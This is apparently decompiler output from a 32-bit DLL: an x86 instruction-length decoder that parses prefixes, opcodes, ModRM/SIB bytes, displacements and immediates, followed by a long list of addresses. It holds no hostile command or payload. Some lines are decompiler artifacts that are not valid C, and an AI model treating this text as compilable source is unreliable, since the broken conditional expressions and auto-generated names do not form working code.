                                                                                                                                                				signed int _t343;
                                                                                                                                                				signed int _t345;
                                                                                                                                                				unsigned int* _t346;
                                                                                                                                                				unsigned int _t354;
                                                                                                                                                				signed int _t355;
                                                                                                                                                				void* _t357;
                                                                                                                                                				signed int _t364;
                                                                                                                                                				signed int _t366;
                                                                                                                                                				signed int _t383;
                                                                                                                                                				signed int _t388;
                                                                                                                                                				signed int _t391;
                                                                                                                                                				signed int _t395;
                                                                                                                                                				signed int _t396;
                                                                                                                                                				signed int _t397;
                                                                                                                                                				signed int _t398;
                                                                                                                                                				signed int _t399;
                                                                                                                                                				signed int _t400;
                                                                                                                                                				signed int _t403;
                                                                                                                                                				signed int _t408;
                                                                                                                                                				signed int _t411;
                                                                                                                                                				signed int _t412;
                                                                                                                                                				signed int _t413;
                                                                                                                                                				signed int _t417;
                                                                                                                                                				signed int _t419;
                                                                                                                                                				signed int _t424;
                                                                                                                                                				void* _t426;
                                                                                                                                                				signed int* _t427;
                                                                                                                                                
                                                                                                                                                				 *((intOrPtr*)(_t426 + 0x24)) = __edx;
                                                                                                                                                				 *((intOrPtr*)(_t426 + 0x10)) = __ecx;
                                                                                                                                                				 *((intOrPtr*)(_t426 + 0x14)) = __ecx;
                                                                                                                                                				_t274 =  *(_t426 + 0x48);
                                                                                                                                                				E10013670( *(_t426 + 0x48), 0, 0x1c);
                                                                                                                                                				_t427 = _t426 + 0xc;
                                                                                                                                                				_t338 = 0;
                                                                                                                                                				_t282 = 0x10;
                                                                                                                                                				do {
                                                                                                                                                					_t250 =  *_t274 & 0x000000ff;
                                                                                                                                                					_t274 =  &(_t274[0]);
                                                                                                                                                					if(_t250 == 0xf3) {
                                                                                                                                                						_t383 = _t427[0x10];
                                                                                                                                                						_t339 = _t338 | 0x00000004;
                                                                                                                                                						L17:
                                                                                                                                                						_t338 = _t339 & 0x000000ff;
                                                                                                                                                						 *(_t383 + 1) = _t250;
                                                                                                                                                						goto L18;
                                                                                                                                                					}
                                                                                                                                                					if(_t250 == 0xf2) {
                                                                                                                                                						_t383 = _t427[0x10];
                                                                                                                                                						_t339 = _t338 | 0x00000002;
                                                                                                                                                						goto L17;
                                                                                                                                                					}
                                                                                                                                                					if(_t250 == 0xf0) {
                                                                                                                                                						_t338 = (_t338 | 0x00000020) & 0x000000ff;
                                                                                                                                                						 *(_t427[0x10] + 2) = _t250;
                                                                                                                                                						goto L18;
                                                                                                                                                					}
                                                                                                                                                					if(_t250 == 0x26 || _t250 == 0x2e || _t250 == 0x36 || _t250 == 0x3e) {
                                                                                                                                                						L13:
                                                                                                                                                						_t338 = (_t338 | 0x00000040) & 0x000000ff;
                                                                                                                                                						 *(_t427[0x10] + 3) = _t250;
                                                                                                                                                					} else {
                                                                                                                                                						_t6 = _t250 - 0x64; // -100
                                                                                                                                                						if(_t6 <= 1) {
                                                                                                                                                							goto L13;
                                                                                                                                                						}
                                                                                                                                                						if(_t250 == 0x66) {
                                                                                                                                                							_t338 = (_t338 | 0x00000008) & 0x000000ff;
                                                                                                                                                							 *(_t427[0x10] + 4) = _t250;
                                                                                                                                                							goto L18;
                                                                                                                                                						}
                                                                                                                                                						if(_t250 != 0x67) {
                                                                                                                                                							break;
                                                                                                                                                						} else {
                                                                                                                                                							_t338 = _t338 | 0x00000010;
                                                                                                                                                							 *(_t427[0x10] + 5) = _t250;
                                                                                                                                                							goto L18;
                                                                                                                                                						}
                                                                                                                                                					}
                                                                                                                                                					L18:
                                                                                                                                                					_t282 = _t282 + 0xff;
                                                                                                                                                				} while (_t282 != 0);
                                                                                                                                                				_t388 = _t427[0x10];
                                                                                                                                                				_t285 =  !=  ? _t338 : 1;
                                                                                                                                                				_t343 = _t338 << 0x17;
                                                                                                                                                				 *(_t388 + 6) = _t250;
                                                                                                                                                				 *_t427 =  !=  ? _t338 : 1;
                                                                                                                                                				 *(_t388 + 0x18) = _t343;
                                                                                                                                                				if(_t250 == 0xf) {
                                                                                                                                                					_t250 =  *_t274 & 0x000000ff;
                                                                                                                                                					_t274 =  &(_t274[0]);
                                                                                                                                                					_t427[5] = _t250;
                                                                                                                                                					 *(_t427[0x10] + 7) = _t250;
                                                                                                                                                					_t427[2] = _t427[4] + 0x4a;
                                                                                                                                                				} else {
                                                                                                                                                					_t22 = _t250 - 0xa0; // -160
                                                                                                                                                					_t427[5] =  *(_t427[0x10] + 7) & 0x000000ff;
                                                                                                                                                					if(_t22 <= 3) {
                                                                                                                                                						_t424 =  *_t427;
                                                                                                                                                						_t382 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
                                                                                                                                                						 *_t427 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                				_t354 = _t250 >> 2;
                                                                                                                                                				_t391 = _t250 & 0x00000003;
                                                                                                                                                				_t345 = _t427[2];
                                                                                                                                                				_t427[3] = _t391;
                                                                                                                                                				_t427[6] = _t354;
                                                                                                                                                				_t288 =  *(( *(_t354 + _t345) & 0x000000ff) + _t391 + _t345) & 0x000000ff;
                                                                                                                                                				_t427[1] = _t288;
                                                                                                                                                				if(_t288 == 0xff) {
                                                                                                                                                					_t343 = _t343 + 0x3000;
                                                                                                                                                					_t288 = 0 | (_t250 & 0xfffffffd) == 0x00000024;
                                                                                                                                                					 *(_t427[0x10] + 0x18) = _t343;
                                                                                                                                                					_t427[1] = _t288;
                                                                                                                                                				}
                                                                                                                                                				if((_t427[1] & 0x00000080) != 0) {
                                                                                                                                                					_t290 =  *((_t288 & 0x0000007f) + _t345) & 0x0000ffff;
                                                                                                                                                					_t427[1] = _t290;
                                                                                                                                                					_t395 = _t290 >> 8;
                                                                                                                                                				} else {
                                                                                                                                                					_t395 = 0;
                                                                                                                                                				}
                                                                                                                                                				if(_t427[5] != 0 && ( *_t427 &  *(( *(_t427[6] + _t427[4] + 0x130) & 0x000000ff) + _t427[3] + _t427[4] + 0x130) & 0x000000ff) != 0) {
                                                                                                                                                					_t343 = _t343 | 0x00003000;
                                                                                                                                                					 *(_t427[0x10] + 0x18) = _t343;
                                                                                                                                                				}
                                                                                                                                                				if((_t427[1] & 0x00000001) == 0) {
                                                                                                                                                					if(( *_t427 & 0x00000020) != 0) {
                                                                                                                                                						_t343 = _t343 | 0x00009000;
                                                                                                                                                						 *(_t427[0x10] + 0x18) = _t343;
                                                                                                                                                					}
                                                                                                                                                					goto L114;
                                                                                                                                                				} else {
                                                                                                                                                					_t355 = _t427[0x10];
                                                                                                                                                					_t343 = _t343 | 0x00000001;
                                                                                                                                                					 *(_t355 + 0x18) = _t343;
                                                                                                                                                					_t296 =  *_t274 & 0x000000ff;
                                                                                                                                                					_t346 =  &(_t427[6]);
                                                                                                                                                					 *_t346 = _t296;
                                                                                                                                                					 *(_t355 + 8) = _t296;
                                                                                                                                                					_t297 = _t296 >> 6;
                                                                                                                                                					_t427[3] = _t297;
                                                                                                                                                					 *(_t355 + 9) = _t297;
                                                                                                                                                					_t299 =  *_t346 & 0x00000007;
                                                                                                                                                					_t427[7] = _t299;
                                                                                                                                                					 *(_t355 + 0xb) = _t299;
                                                                                                                                                					_t301 =  *_t346 & 0x0000003f;
                                                                                                                                                					 *_t346 = _t301;
                                                                                                                                                					_t302 = _t301 >> 3;
                                                                                                                                                					_t427[2] = _t302;
                                                                                                                                                					 *(_t355 + 0xa) = _t302;
                                                                                                                                                					if(_t395 != 0 && (_t395 << _t302 & 0x00000080) != 0) {
                                                                                                                                                						_t343 = _t343 | 0x00003000;
                                                                                                                                                						 *(_t427[0x10] + 0x18) = _t343;
                                                                                                                                                					}
                                                                                                                                                					if(_t427[5] == 0) {
                                                                                                                                                						_t80 = _t250 - 0xd9; // -217
                                                                                                                                                						if(_t80 <= 6) {
                                                                                                                                                							_t81 = _t250 + 0x27; // 0x27
                                                                                                                                                							_t417 = _t81 & 0x000000ff;
                                                                                                                                                							if(_t427[3] != 3) {
                                                                                                                                                								_t419 = ( *(_t417 + _t427[4] + 0xf1) & 0x000000ff) << _t427[2];
                                                                                                                                                							} else {
                                                                                                                                                								_t419 = ( *(_t427[4] + _t427[2] + 0xf8 + _t417 * 8) & 0x000000ff) << _t427[7];
                                                                                                                                                							}
                                                                                                                                                							if((_t419 & 0x00000080) != 0) {
                                                                                                                                                								_t343 = _t343 | 0x00003000;
                                                                                                                                                								 *(_t427[0x10] + 0x18) = _t343;
                                                                                                                                                							}
                                                                                                                                                						}
                                                                                                                                                					}
                                                                                                                                                					if(( *_t427 & 0x00000020) == 0) {
                                                                                                                                                						L52:
                                                                                                                                                						if(_t427[5] == 0) {
                                                                                                                                                							if(_t250 == 0x8c) {
                                                                                                                                                								L85:
                                                                                                                                                								if(_t427[2] <= 5) {
                                                                                                                                                									L87:
                                                                                                                                                									_t427[5] = _t274[0];
                                                                                                                                                									_t427[4] =  &(_t274[1]);
                                                                                                                                                									if(_t427[2] <= 1) {
                                                                                                                                                										if(_t250 != 0xf6) {
                                                                                                                                                											_t309 = _t427[1];
                                                                                                                                                											_t310 =  ==  ? _t309 | 0xffffff90 : _t309;
                                                                                                                                                											_t427[1] =  ==  ? _t309 | 0xffffff90 : _t309;
                                                                                                                                                										} else {
                                                                                                                                                											_t427[1] = _t427[1] | 0xffffff82;
                                                                                                                                                										}
                                                                                                                                                									}
                                                                                                                                                									if(_t427[3] == 0) {
                                                                                                                                                										if(( *_t427 & 0x00000010) == 0) {
                                                                                                                                                											_t264 = 4;
                                                                                                                                                											_t357 =  ==  ? _t264 : 0;
                                                                                                                                                										} else {
                                                                                                                                                											_t273 = 2;
                                                                                                                                                											_t357 =  ==  ? _t273 : 0;
                                                                                                                                                										}
                                                                                                                                                									} else {
                                                                                                                                                										if(_t427[3] == 1) {
                                                                                                                                                											_t357 = 1;
                                                                                                                                                										} else {
                                                                                                                                                											if(_t427[3] == 2) {
                                                                                                                                                												_t357 = (( !( *_t427) & 0x00000010) >> 3) + 2;
                                                                                                                                                											} else {
                                                                                                                                                												_t357 = 0;
                                                                                                                                                											}
                                                                                                                                                										}
                                                                                                                                                									}
                                                                                                                                                									if(_t427[3] != 3 && _t427[7] == 4 && ( *_t427 & 0x00000010) == 0) {
                                                                                                                                                										_t307 = _t427[5];
                                                                                                                                                										_t343 = _t343 | 0x00000002;
                                                                                                                                                										_t403 = _t427[0x10];
                                                                                                                                                										_t427[4] =  &(_t274[1]);
                                                                                                                                                										 *(_t403 + 0xc) = _t307;
                                                                                                                                                										_t308 = _t307 & 0x00000007;
                                                                                                                                                										 *(_t403 + 0x18) = _t343;
                                                                                                                                                										 *(_t403 + 0xd) = _t307 >> 6;
                                                                                                                                                										 *(_t403 + 0xe) = (_t307 & 0x0000003f) >> 3;
                                                                                                                                                										 *(_t403 + 0xf) = _t308;
                                                                                                                                                										if(_t308 == 5) {
                                                                                                                                                											_t272 = 4;
                                                                                                                                                											_t357 =  ==  ? _t272 : _t357;
                                                                                                                                                										}
                                                                                                                                                									}
                                                                                                                                                									if(_t357 == 1) {
                                                                                                                                                										_t304 = _t427[0x10];
                                                                                                                                                										_t343 = _t343 | 0x00000020;
                                                                                                                                                										 *(_t304 + 0x18) = _t343;
                                                                                                                                                										 *((char*)(_t304 + 0x14)) =  *(_t427[4] - 1);
                                                                                                                                                									} else {
                                                                                                                                                										if(_t357 == 2) {
                                                                                                                                                											_t277 = _t427[0x10];
                                                                                                                                                											_t343 = _t343 | 0x00000040;
                                                                                                                                                											 *(_t277 + 0x18) = _t343;
                                                                                                                                                											 *((short*)(_t277 + 0x14)) =  *(_t427[4] - 1) & 0x0000ffff;
                                                                                                                                                										} else {
                                                                                                                                                											if(_t357 == 4) {
                                                                                                                                                												_t278 = _t427[0x10];
                                                                                                                                                												_t343 = _t343 | 0x00000080;
                                                                                                                                                												 *(_t278 + 0x18) = _t343;
                                                                                                                                                												 *(_t278 + 0x14) =  *(_t427[4] - 1);
                                                                                                                                                											}
                                                                                                                                                										}
                                                                                                                                                									}
                                                                                                                                                									_t195 = _t427[4] - 1; // -1
                                                                                                                                                									_t274 = _t357 + _t195;
                                                                                                                                                									L114:
                                                                                                                                                									_t251 = _t427[1];
                                                                                                                                                									_t292 = _t251 & 0x00000040;
                                                                                                                                                									if((_t251 & 0x00000010) == 0) {
                                                                                                                                                										L121:
                                                                                                                                                										if((_t427[1] & 0x00000004) == 0) {
                                                                                                                                                											L129:
                                                                                                                                                											if((_t427[1] & 0x00000002) != 0) {
                                                                                                                                                												_t396 = _t427[0x10];
                                                                                                                                                												_t343 = _t343 | 0x00000004;
                                                                                                                                                												 *(_t396 + 0x18) = _t343;
                                                                                                                                                												_t257 =  *_t274;
                                                                                                                                                												_t274 =  &(_t274[0]);
                                                                                                                                                												 *((char*)(_t396 + 0x10)) = _t257;
                                                                                                                                                											}
                                                                                                                                                											if(_t292 == 0) {
                                                                                                                                                												if((_t427[1] & 0x00000020) != 0) {
                                                                                                                                                													_t293 = _t427[0x10];
                                                                                                                                                													_t343 = _t343 | 0x00000104;
                                                                                                                                                													 *(_t293 + 0x18) = _t343;
                                                                                                                                                													_t255 =  *_t274;
                                                                                                                                                													_t274 =  &(_t274[0]);
                                                                                                                                                													 *((char*)(_t293 + 0x10)) = _t255;
                                                                                                                                                												}
                                                                                                                                                												goto L135;
                                                                                                                                                											} else {
                                                                                                                                                												L132:
                                                                                                                                                												_t294 = _t427[0x10];
                                                                                                                                                												_t343 = _t343 | 0x00000110;
                                                                                                                                                												 *(_t294 + 0x18) = _t343;
                                                                                                                                                												_t256 =  *_t274;
                                                                                                                                                												_t274 =  &(_t274[2]);
                                                                                                                                                												 *(_t294 + 0x10) = _t256;
                                                                                                                                                												L135:
                                                                                                                                                												_t275 = _t274 - _t427[0xf];
                                                                                                                                                												if(_t275 <= 0xf) {
                                                                                                                                                													 *(_t427[0x10]) = _t275;
                                                                                                                                                												} else {
                                                                                                                                                													_t254 = _t427[0x10];
                                                                                                                                                													_t275 = 0xf;
                                                                                                                                                													_t254[0x18] = _t343 | 0x00005000;
                                                                                                                                                													 *_t254 = _t275;
                                                                                                                                                												}
                                                                                                                                                												return _t275 & 0x000000ff;
                                                                                                                                                											}
                                                                                                                                                										}
                                                                                                                                                										if((_t343 & 0x00000010) == 0) {
                                                                                                                                                											if((_t343 & 0x00000008) == 0) {
                                                                                                                                                												_t397 = _t427[0x10];
                                                                                                                                                												_t343 = _t343 | 0x00000008;
                                                                                                                                                												 *(_t397 + 0x18) = _t343;
                                                                                                                                                												 *((short*)(_t397 + 0x10)) =  *_t274 & 0x0000ffff;
                                                                                                                                                												L128:
                                                                                                                                                												_t274 =  &(_t274[1]);
                                                                                                                                                												goto L129;
                                                                                                                                                											}
                                                                                                                                                											_t398 = _t427[0x10];
                                                                                                                                                											_t343 = _t343 | 0x00000800;
                                                                                                                                                											L126:
                                                                                                                                                											 *(_t398 + 0x18) = _t343;
                                                                                                                                                											 *((short*)(_t398 + 0x14)) =  *_t274 & 0x0000ffff;
                                                                                                                                                											goto L128;
                                                                                                                                                										}
                                                                                                                                                										_t398 = _t427[0x10];
                                                                                                                                                										_t343 = _t343 | 0x00000008;
                                                                                                                                                										goto L126;
                                                                                                                                                									}
                                                                                                                                                									if(_t292 == 0) {
                                                                                                                                                										if(( *_t427 & 0x00000008) == 0) {
                                                                                                                                                											_t399 = _t427[0x10];
                                                                                                                                                											_t343 = _t343 | 0x00000010;
                                                                                                                                                											 *(_t399 + 0x18) = _t343;
                                                                                                                                                											_t260 =  *_t274;
                                                                                                                                                											_t274 =  &(_t274[2]);
                                                                                                                                                											 *(_t399 + 0x10) = _t260;
                                                                                                                                                										} else {
                                                                                                                                                											_t400 = _t427[0x10];
                                                                                                                                                											_t343 = _t343 | 0x00000008;
                                                                                                                                                											 *(_t400 + 0x18) = _t343;
                                                                                                                                                											_t261 =  *_t274 & 0x0000ffff;
                                                                                                                                                											_t274 =  &(_t274[1]);
                                                                                                                                                											 *(_t400 + 0x10) = _t261;
                                                                                                                                                										}
                                                                                                                                                										goto L121;
                                                                                                                                                									}
                                                                                                                                                									if(( *_t427 & 0x00000008) == 0) {
                                                                                                                                                										goto L132;
                                                                                                                                                									}
                                                                                                                                                									_t295 = _t427[0x10];
                                                                                                                                                									_t343 = _t343 | 0x00000108;
                                                                                                                                                									 *(_t295 + 0x18) = _t343;
                                                                                                                                                									_t262 =  *_t274 & 0x0000ffff;
                                                                                                                                                									_t274 =  &(_t274[1]);
                                                                                                                                                									 *(_t295 + 0x10) = _t262;
                                                                                                                                                									goto L135;
                                                                                                                                                								}
                                                                                                                                                								L86:
                                                                                                                                                								_t343 = _t343 | 0x00011000;
                                                                                                                                                								 *(_t427[0x10] + 0x18) = _t343;
                                                                                                                                                								goto L87;
                                                                                                                                                							}
                                                                                                                                                							if(_t250 != 0x8e) {
                                                                                                                                                								L66:
                                                                                                                                                								if(_t427[3] != 3) {
                                                                                                                                                									if(_t427[5] == 0) {
                                                                                                                                                										goto L87;
                                                                                                                                                									}
                                                                                                                                                									if(_t250 == 0xd7 || _t250 == 0xf7) {
                                                                                                                                                										L83:
                                                                                                                                                										if(( *_t427 & 0x00000009) != 0) {
                                                                                                                                                											goto L86;
                                                                                                                                                										}
                                                                                                                                                									} else {
                                                                                                                                                										if(_t250 == 0xd6) {
                                                                                                                                                											if(( *_t427 & 0x00000006) != 0) {
                                                                                                                                                												goto L86;
                                                                                                                                                											}
                                                                                                                                                											goto L87;
                                                                                                                                                										}
                                                                                                                                                										if(_t250 == 0xc5) {
                                                                                                                                                											goto L86;
                                                                                                                                                										}
                                                                                                                                                										if(_t250 == 0x50) {
                                                                                                                                                											goto L83;
                                                                                                                                                										}
                                                                                                                                                									}
                                                                                                                                                									goto L87;
                                                                                                                                                								}
                                                                                                                                                								_t364 = _t427[4];
                                                                                                                                                								_t312 = _t364 + 0x1da;
                                                                                                                                                								_t366 =  !=  ? _t312 : _t364 + 0x1cb;
                                                                                                                                                								_t313 =  !=  ? _t427[9] + _t364 : _t312;
                                                                                                                                                								_t427[4] = _t366;
                                                                                                                                                								if(_t366 == _t313) {
                                                                                                                                                									goto L87;
                                                                                                                                                								} else {
                                                                                                                                                									goto L68;
                                                                                                                                                								}
                                                                                                                                                								while(1) {
                                                                                                                                                									L68:
                                                                                                                                                									_t408 = _t427[4];
                                                                                                                                                									if(_t250 ==  *_t408) {
                                                                                                                                                										break;
                                                                                                                                                									}
                                                                                                                                                									_t411 = _t408 + 3;
                                                                                                                                                									_t427[4] = _t411;
                                                                                                                                                									if(_t411 != _t313) {
                                                                                                                                                										continue;
                                                                                                                                                									}
                                                                                                                                                									goto L87;
                                                                                                                                                								}
                                                                                                                                                								_t314 = _t408;
                                                                                                                                                								if(( *_t427 &  *(_t314 + 1) & 0x000000ff) == 0) {
                                                                                                                                                									goto L87;
                                                                                                                                                								}
                                                                                                                                                								if((( *(_t314 + 2) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
                                                                                                                                                									goto L86;
                                                                                                                                                								}
                                                                                                                                                								goto L87;
                                                                                                                                                							}
                                                                                                                                                							if(_t427[2] == 1) {
                                                                                                                                                								goto L86;
                                                                                                                                                							}
                                                                                                                                                							goto L85;
                                                                                                                                                						}
                                                                                                                                                						if(_t250 == 0x20 || _t250 == 0x22) {
                                                                                                                                                							_t316 = 3;
                                                                                                                                                							_t427[3] = _t316;
                                                                                                                                                							if(_t427[2] > 4 || _t427[2] == 1) {
                                                                                                                                                								goto L86;
                                                                                                                                                							} else {
                                                                                                                                                								goto L87;
                                                                                                                                                							}
                                                                                                                                                						} else {
                                                                                                                                                							if(_t250 == 0x21 || _t250 == 0x23) {
                                                                                                                                                								_t319 = 3;
                                                                                                                                                								_t427[3] = _t319;
                                                                                                                                                								if((_t427[6] & 0xfffffff0) == 0x20) {
                                                                                                                                                									goto L86;
                                                                                                                                                								}
                                                                                                                                                								goto L87;
                                                                                                                                                							} else {
                                                                                                                                                								goto L66;
                                                                                                                                                							}
                                                                                                                                                						}
                                                                                                                                                					}
                                                                                                                                                					if(_t427[3] == 3) {
                                                                                                                                                						L51:
                                                                                                                                                						_t343 = _t343 | 0x00009000;
                                                                                                                                                						 *(_t427[0x10] + 0x18) = _t343;
                                                                                                                                                						goto L52;
                                                                                                                                                					}
                                                                                                                                                					_t412 = _t427[4];
                                                                                                                                                					_t321 = _t250;
                                                                                                                                                					_t427[8] = _t412 + 0x1b9;
                                                                                                                                                					if(_t427[5] == 0) {
                                                                                                                                                						_t413 = _t412 + 0x1a1;
                                                                                                                                                						_t321 = _t250 & 0x000000fe;
                                                                                                                                                					} else {
                                                                                                                                                						_t413 = _t427[8];
                                                                                                                                                						_t427[8] = _t412 + 0x1cb;
                                                                                                                                                					}
                                                                                                                                                					while(_t413 != _t427[8]) {
                                                                                                                                                						if(_t321 ==  *_t413) {
                                                                                                                                                							if((( *(_t413 + 1) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
                                                                                                                                                								goto L52;
                                                                                                                                                							}
                                                                                                                                                							goto L51;
                                                                                                                                                						}
                                                                                                                                                						_t413 = _t413 + 2;
                                                                                                                                                					}
                                                                                                                                                					goto L51;
                                                                                                                                                				}
                                                                                                                                                			}






































































                                                                                                                                                0x1001934f
                                                                                                                                                0x10019353
                                                                                                                                                0x1001935f
                                                                                                                                                0x10019363
                                                                                                                                                0x10019367
                                                                                                                                                0x1001936c
                                                                                                                                                0x1001936f
                                                                                                                                                0x10019371
                                                                                                                                                0x10019373
                                                                                                                                                0x10019373
                                                                                                                                                0x10019376
                                                                                                                                                0x1001937c
                                                                                                                                                0x100193f4
                                                                                                                                                0x100193f8
                                                                                                                                                0x100193fb
                                                                                                                                                0x100193fb
                                                                                                                                                0x100193fe
                                                                                                                                                0x00000000
                                                                                                                                                0x100193fe
                                                                                                                                                0x10019383
                                                                                                                                                0x100193eb
                                                                                                                                                0x100193ef
                                                                                                                                                0x00000000
                                                                                                                                                0x100193ef
                                                                                                                                                0x1001938a
                                                                                                                                                0x100193e3
                                                                                                                                                0x100193e6
                                                                                                                                                0x00000000
                                                                                                                                                0x100193e6
                                                                                                                                                0x1001938f
                                                                                                                                                0x100193cd
                                                                                                                                                0x100193d4
                                                                                                                                                0x100193d7
                                                                                                                                                0x100193a0
                                                                                                                                                0x100193a0
                                                                                                                                                0x100193a6
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x100193ab
                                                                                                                                                0x100193c5
                                                                                                                                                0x100193c8
                                                                                                                                                0x00000000
                                                                                                                                                0x100193c8
                                                                                                                                                0x100193b0
                                                                                                                                                0x00000000
                                                                                                                                                0x100193b2
                                                                                                                                                0x100193b6
                                                                                                                                                0x100193b9
                                                                                                                                                0x00000000
                                                                                                                                                0x100193b9
                                                                                                                                                0x100193b0
                                                                                                                                                0x10019401
                                                                                                                                                0x10019401
                                                                                                                                                0x10019401
                                                                                                                                                0x1001940a
                                                                                                                                                0x10019413
                                                                                                                                                0x10019416
                                                                                                                                                0x10019419
                                                                                                                                                0x1001941c
                                                                                                                                                0x1001941f
                                                                                                                                                0x10019425
                                                                                                                                                0x10019467
                                                                                                                                                0x1001946a
                                                                                                                                                0x1001946b
                                                                                                                                                0x10019472
                                                                                                                                                0x10019475
                                                                                                                                                0x10019427
                                                                                                                                                0x1001942b
                                                                                                                                                0x10019435
                                                                                                                                                0x1001943c
                                                                                                                                                0x1001943e
                                                                                                                                                0x10019457
                                                                                                                                                0x1001945a
                                                                                                                                                0x1001945a
                                                                                                                                                0x1001943c
                                                                                                                                                0x1001947d
                                                                                                                                                0x10019480
                                                                                                                                                0x10019483
                                                                                                                                                0x10019487
                                                                                                                                                0x1001948b
                                                                                                                                                0x10019495
                                                                                                                                                0x10019499
                                                                                                                                                0x100194a3
                                                                                                                                                0x100194ac
                                                                                                                                                0x100194b9
                                                                                                                                                0x100194bc
                                                                                                                                                0x100194bf
                                                                                                                                                0x100194bf
                                                                                                                                                0x100194cb
                                                                                                                                                0x100194d6
                                                                                                                                                0x100194dc
                                                                                                                                                0x100194e0
                                                                                                                                                0x100194cd
                                                                                                                                                0x100194cd
                                                                                                                                                0x100194cd
                                                                                                                                                0x100194e8
                                                                                                                                                0x10019512
                                                                                                                                                0x10019518
                                                                                                                                                0x10019518
                                                                                                                                                0x10019520
                                                                                                                                                0x100198c9
                                                                                                                                                0x100198cf
                                                                                                                                                0x100198d5
                                                                                                                                                0x100198d5
                                                                                                                                                0x00000000
                                                                                                                                                0x10019526
                                                                                                                                                0x10019526
                                                                                                                                                0x1001952a
                                                                                                                                                0x1001952d
                                                                                                                                                0x10019530
                                                                                                                                                0x10019533
                                                                                                                                                0x10019537
                                                                                                                                                0x10019539
                                                                                                                                                0x1001953c
                                                                                                                                                0x1001953f
                                                                                                                                                0x10019543
                                                                                                                                                0x10019548
                                                                                                                                                0x1001954b
                                                                                                                                                0x1001954f
                                                                                                                                                0x10019554
                                                                                                                                                0x10019557
                                                                                                                                                0x10019559
                                                                                                                                                0x1001955c
                                                                                                                                                0x10019560
                                                                                                                                                0x10019565
                                                                                                                                                0x10019575
                                                                                                                                                0x1001957b
                                                                                                                                                0x1001957b
                                                                                                                                                0x10019583
                                                                                                                                                0x10019585
                                                                                                                                                0x1001958e
                                                                                                                                                0x10019590
                                                                                                                                                0x10019593
                                                                                                                                                0x1001959e
                                                                                                                                                0x100195cb
                                                                                                                                                0x100195a0
                                                                                                                                                0x100195b7
                                                                                                                                                0x100195b7
                                                                                                                                                0x100195d3
                                                                                                                                                0x100195d9
                                                                                                                                                0x100195df
                                                                                                                                                0x100195df
                                                                                                                                                0x100195d3
                                                                                                                                                0x1001958e
                                                                                                                                                0x100195e6
                                                                                                                                                0x10019657
                                                                                                                                                0x1001965c
                                                                                                                                                0x100196b5
                                                                                                                                                0x10019777
                                                                                                                                                0x1001977c
                                                                                                                                                0x1001978b
                                                                                                                                                0x10019791
                                                                                                                                                0x10019795
                                                                                                                                                0x1001979e
                                                                                                                                                0x100197a5
                                                                                                                                                0x100197ae
                                                                                                                                                0x100197bc
                                                                                                                                                0x100197bf
                                                                                                                                                0x100197a7
                                                                                                                                                0x100197a7
                                                                                                                                                0x100197a7
                                                                                                                                                0x100197a5
                                                                                                                                                0x100197c8
                                                                                                                                                0x100197f5
                                                                                                                                                0x10019808
                                                                                                                                                0x10019810
                                                                                                                                                0x100197f7
                                                                                                                                                0x100197f9
                                                                                                                                                0x10019801
                                                                                                                                                0x10019801
                                                                                                                                                0x100197ca
                                                                                                                                                0x100197cf
                                                                                                                                                0x100197ee
                                                                                                                                                0x100197d1
                                                                                                                                                0x100197d6
                                                                                                                                                0x100197e7
                                                                                                                                                0x100197d8
                                                                                                                                                0x100197d8
                                                                                                                                                0x100197d8
                                                                                                                                                0x100197d6
                                                                                                                                                0x100197cf
                                                                                                                                                0x10019818
                                                                                                                                                0x10019827
                                                                                                                                                0x10019834
                                                                                                                                                0x1001983d
                                                                                                                                                0x10019841
                                                                                                                                                0x10019845
                                                                                                                                                0x10019848
                                                                                                                                                0x1001984b
                                                                                                                                                0x1001984e
                                                                                                                                                0x10019851
                                                                                                                                                0x10019854
                                                                                                                                                0x1001985a
                                                                                                                                                0x1001985e
                                                                                                                                                0x10019864
                                                                                                                                                0x10019864
                                                                                                                                                0x1001985a
                                                                                                                                                0x1001986a
                                                                                                                                                0x100198a7
                                                                                                                                                0x100198ab
                                                                                                                                                0x100198b2
                                                                                                                                                0x100198b8
                                                                                                                                                0x1001986c
                                                                                                                                                0x1001986f
                                                                                                                                                0x1001988f
                                                                                                                                                0x10019893
                                                                                                                                                0x1001989a
                                                                                                                                                0x100198a1
                                                                                                                                                0x10019871
                                                                                                                                                0x10019874
                                                                                                                                                0x10019876
                                                                                                                                                0x1001987a
                                                                                                                                                0x10019884
                                                                                                                                                0x1001988a
                                                                                                                                                0x1001988a
                                                                                                                                                0x10019874
                                                                                                                                                0x1001986f
                                                                                                                                                0x100198bf
                                                                                                                                                0x100198bf
                                                                                                                                                0x100198d8
                                                                                                                                                0x100198d8
                                                                                                                                                0x100198de
                                                                                                                                                0x100198e3
                                                                                                                                                0x1001993d
                                                                                                                                                0x10019942
                                                                                                                                                0x10019981
                                                                                                                                                0x10019986
                                                                                                                                                0x10019988
                                                                                                                                                0x1001998c
                                                                                                                                                0x1001998f
                                                                                                                                                0x10019992
                                                                                                                                                0x10019994
                                                                                                                                                0x10019995
                                                                                                                                                0x10019995
                                                                                                                                                0x1001999a
                                                                                                                                                0x100199b8
                                                                                                                                                0x100199ba
                                                                                                                                                0x100199be
                                                                                                                                                0x100199c4
                                                                                                                                                0x100199c7
                                                                                                                                                0x100199c9
                                                                                                                                                0x100199ca
                                                                                                                                                0x100199ca
                                                                                                                                                0x00000000
                                                                                                                                                0x1001999c
                                                                                                                                                0x1001999c
                                                                                                                                                0x1001999c
                                                                                                                                                0x100199a0
                                                                                                                                                0x100199a6
                                                                                                                                                0x100199a9
                                                                                                                                                0x100199ab
                                                                                                                                                0x100199ae
                                                                                                                                                0x100199cd
                                                                                                                                                0x100199cd
                                                                                                                                                0x100199d4
                                                                                                                                                0x100199ee
                                                                                                                                                0x100199d6
                                                                                                                                                0x100199d6
                                                                                                                                                0x100199e2
                                                                                                                                                0x100199e3
                                                                                                                                                0x100199e6
                                                                                                                                                0x100199e6
                                                                                                                                                0x100199fc
                                                                                                                                                0x100199fc
                                                                                                                                                0x1001999a
                                                                                                                                                0x10019947
                                                                                                                                                0x10019955
                                                                                                                                                0x1001996d
                                                                                                                                                0x10019971
                                                                                                                                                0x10019974
                                                                                                                                                0x1001997a
                                                                                                                                                0x1001997e
                                                                                                                                                0x1001997e
                                                                                                                                                0x00000000
